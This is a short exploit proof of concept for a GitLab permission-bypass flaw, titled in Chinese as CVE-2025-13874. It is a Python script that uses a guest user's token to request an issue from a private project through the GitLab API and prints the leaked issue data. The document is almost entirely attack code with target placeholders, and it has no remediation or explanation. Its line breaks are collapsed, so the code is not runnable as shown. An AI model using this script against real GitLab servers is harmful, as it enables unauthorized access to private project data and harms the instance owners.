CVE-2025-13874 GitLab权限绕过漏洞

import requests # Configuration TARGET_URL = "https://your-gitlab-instance.com" PRIVATE_PROJECT_ID = "123" # ID of the target private project PRIVATE_ISSUE_IID = "1" # Internal ID of the issue ATTACKER_TOKEN = "glpat-guest_token_here" # Guest user's token # Headers headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Exploit attempt: Accessing private issue via API # GitLab API endpoint: /api/v4/projects/:id/issues/:issue_iid endpoint = f"{TARGET_URL}/api/v4/projects/{PRIVATE_PROJECT_ID}/issues/{PRIVATE_ISSUE_IID}" try: response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: print("[+] Vulnerability Confirmed!") print("[+] Issue Details Leaked:") print(response.json()) else: print(f"[-] Failed. Status Code: {response.status_code}") print(response.text) except Exception as e: print(f"Error: {e}")